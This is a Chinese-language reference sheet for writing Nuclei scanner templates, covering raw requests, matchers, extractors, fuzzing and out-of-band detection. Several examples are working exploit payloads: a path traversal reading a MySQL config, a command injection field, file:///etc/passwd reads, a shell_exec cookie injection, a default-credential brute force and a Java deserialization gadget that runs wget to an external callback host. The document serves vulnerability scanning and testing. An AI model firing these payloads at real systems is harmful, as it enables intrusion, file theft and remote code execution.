官方文档 : https://nuclei.projectdiscovery.io/templating-guide

nuclei 2.9.1 更新了模版格式，后续nuclei版本要大于等于 291 不然可能解析不了模版格式
  - https://github.com/projectdiscovery/nuclei/releases/tag/v2.9.1
  - https://github.com/projectdiscovery/nuclei/issues/3055

 ----------------------------分割线----------------------------
info:
  metadata:
    fofa-query: 'body="公司"'
    shodan-query: 'vuln:CVE-2021-26855'
    hunter-query: 'web.body="公司"'

 ----------------------------分割线----------------------------

RAW : # 解析 raw 格式请求
http:
  - raw:
      - |
        POST /ispirit/interface/gateway.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        json={"url":"/general/../../mysql5/my.ini"}

 ----------------------------分割线----------------------------

# 在多个请求之间维护基于cookie的类似浏览器的会话，可以在⼀系列请求间维护⾝份验证会话以完成攻击链
# 接受布尔类型的输入，默认值为false
cookie-reuse: true

 ----------------------------分割线----------------------------
# DSL 匹配器
    matchers:
      - type: dsl
        dsl:
          - "contains(toupper(body), md5(cookie))" # 检查Cookie的MD5校验和是否包含在大写的请求体中
          - "len(body)<1024 && status_code==200" # 请求体长度小于1024且状态码为200
          - "status_code_1 == 404 && status_code_2 == 200 && contains((body_2), 'secret_string')"

      # 基于DSL的持续时间匹配器示例，当响应时间与定义的持续时间匹配时返回true，示例为大于等于6秒
      - type: dsl
        dsl:
          - 'duration>=6'

 ----------------------------分割线----------------------------
# internal: true 避免在终端中打印提取的值

    extractors:
      - type: regex
        name: api # 为提取的信息命名，方便调用
        part: body
        internal: true # 使用动态变量时必须添加此标志
        regex:
          - "(?m)[0-9]{3,10}\\.[0-9]+"

 ----------------------------分割线----------------------------
# Interactsh匹配器，可匹配 interactsh_protocol、interactsh_request和 interactsh_response 三处

matchers-condition: and
matchers:
    - type: word
      part: interactsh_protocol # 确认HTTP交互
      words:
        - "http"

    - type: regex
      part: interactsh_request # 确认检索/etc/passwd文件
      regex:
        - "root:[x*]:0:0:"

      - type: word
        part: interactsh_response # 确认DNS交互
        words:
          - "dns"         

 ----------------------------分割线----------------------------

matchers:
  - type: binary
    binary:
      - "504B0304" # zip archive
      - "526172211A070100" # RAR archive version 5.0
      - "FD377A585A0000" # xz tar.xz archive
    condition: or # 指定单个匹配器内多个条件的与或关系
    part: body

  - type: word
    encoding: hex
    words:
      - "50494e47"
    part: body

 ----------------------------分割线----------------------------
# 读取大小
http:
  - method: GET
    path:
      - "{{BaseURL}}/thumbs.db"
      - "{{BaseURL}}/.svn/wc.db"

    max-size: 500 #bytes 大小 - 从服务器响应中读取的最大大小

 ----------------------------分割线----------------------------
# negative: true 否定匹配器，对匹配器结果进行取反

matchers:
  - type: word
    words:
      - "PHPSESSID"
    part: header
    negative: true

 ----------------------------分割线----------------------------
# @timeout 请求注解的一种，⽤于覆盖默认的请求超时时间
http:
  - raw:
      - |
        @timeout: 25s
        POST /conf_mail.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        mail_address=%3B{{cmd}}%3B&button=%83%81%81%5B%83%8B%91%97%90M

 ----------------------------分割线----------------------------
http:
  - raw:
      - |
        POST /?file={{path}} HTTP/1.1
        User-Agent: {{header}}
        Host: {{Hostname}}

        user={{username}}&passwd={{password}}

    payloads:
      path: helpers/wordlists/prams.txt
      header: helpers/wordlists/header.txt
      username:
        - admin
      password:
        - admin
        - 123456
    attack: clusterbomb  # 定义HTTP模糊攻击类型，可用类型： batteringram,pitchfork,clusterbomb

 ----------------------------分割线----------------------------

# 自定义模版变量 : 自 2.6.9 版本开始支持
variables:
  a1: "{{to_lower(rand_base(5))}}"

http:
  - method: GET
    path:
      - "{{BaseURL}}/?test={{a1}}"

    matchers:
      - type: word
        words:
          - "{{a1}}"
    
 ----------------------------分割线----------------------------

# stop-at-first-match # 当模板里有多个扫描路径,当第一个命中时,自动停止后面几个路径的扫描,这个不会影响其他模板
http:
  - method: GET
    path:
      - "{{BaseURL}}"
      - "{{BaseURL}}/login"
      - "{{BaseURL}}/main"

    stop-at-first-match: true

 ----------------------------分割线----------------------------
# GET : 发送一个GET请求
http:
  - method: GET
    path:
      - "{{BaseURL}}/actuator/env"
    # 发送一些头部信息给服务器的示例
    headers:
      X-Client-IP: 127.0.0.1
      X-Remote-IP: 127.0.0.1
      X-Remote-Addr: 127.0.0.1
      X-Forwarded-For: 127.0.0.1
      X-Originating-IP: 127.0.0.1

 ----------------------------分割线----------------------------
# POST : 发送一个POST请求
http:
  - method: POST
    path:
      - "{{BaseURL}}/sys/ui/extend/varkind/custom.jsp"
    headers:
      Content-Type: application/x-www-form-urlencoded
    body: 'var={"body":{"file":"file:///etc/passwd"}}'

 ----------------------------分割线----------------------------

# 嵌套表达式
# ❌ {{url_decode({{base64_decode('SGVsbG8=')}})}}
# ✔ {{url_decode(base64_decode('SGVsbG8='))}}

# 如果需要在 extractor 中使用,比如将 extractor 提取的变量值 test 进行处理
# {{url_decode(base64_decode('{{test}}'))}}

 ----------------------------分割线----------------------------

# OOB : 自 Nuclei v2.3.6 发行以来，Nuclei 支持使用 interact.sh API 内置自动请求关联来实现基于 OOB 的漏洞扫描。
http:
  - raw:
      - |
        GET /plugins/servlet/oauth/users/icon-uri?consumerUri={{interactsh-url}} HTTP/1.1
        Host: {{Hostname}}

 ----------------------------分割线----------------------------

# JAVA反序列化 : https://nuclei.projectdiscovery.io/templating-guide/helper-functions/#deserialization-helper-functions
raw:
  -  |
    POST /index.faces;jsessionid=x HTTP/1.1
    Host: {{Hostname}}
    Accept-Encoding: gzip, deflate
    Content-Length: 1882
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Connection: close
    Content-Type: application/x-www-form-urlencoded

    javax.faces.ViewState={{generate_java_gadget("commons-collections3.1", "wget http://{{interactsh-url}}", "base64")}}

 ----------------------------分割线----------------------------

# skip-variables-check : 当你的请求内容里包含 {{ 时,会被 nuclei 解析为变量,加这个就是告诉nuclei不要解析.
http:
  - method: GET
    path:
      - "{{BaseURL}}"
    headers:
      Cookie: "CSRF-TOKEN=rnqvt{{shell_exec('cat /etc/passwd')}}to5gw; simcify=uv82sg0jj2oqa0kkr2virls4dl"

    skip-variables-check: true

 ----------------------------分割线----------------------------

# self-contained : 这个用的比较局限,一般就是用于批量检测 API 可用性的,举个例子,你通过信息泄露获得了一个 API_Key 但你不知道这个是哪个服务的 APIkey,没有特征,那么就只能找哪些官方API接口一个一个试,看哪一个平台可以生效,就是这个意思。
id: example-self-contained-input

info:
  name: example-self-contained
  author: pdteam
  severity: info

self-contained: true
http:
  - raw:
      - |
        GET https://example.com:443/gg HTTP/1.1
        Host: example.com:443

 ----------------------------分割线----------------------------

# 文件协议 : 文件模板默认读取的文件大小1GB
file:
  - extensions:
      - all

    extractors:
      - type: regex
        regex:
          - '"type": "service_account"'

 ----------------------------分割线----------------------------

# 网络层
tcp:
  - host:
      - '{{Hostname}}'
      - '{{Host}}:22'

    inputs:
      - data: "\n"

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - 'SSH\-([0-9.-A-Za-z_ ]+)'
